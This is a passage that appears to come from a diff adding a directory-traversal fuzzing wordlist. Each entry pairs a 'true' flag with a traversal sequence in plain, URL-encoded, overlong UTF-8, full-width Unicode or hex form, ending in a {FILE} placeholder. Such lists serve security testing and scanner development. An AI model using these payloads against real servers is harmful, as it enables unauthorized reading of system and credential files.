+ "true,........................................................................../../../../../../../{FILE}",
+ "true,........................................................................../../../../../../../../{FILE}",
+ "true,..........................................................................\\{FILE}",
+ "true,..........................................................................\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%u2215{FILE}",
+ "true,..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
+ "true,%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
+ "true,%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
+ "true,..%u2216{FILE}",
+ "true,..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
+ "true,..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
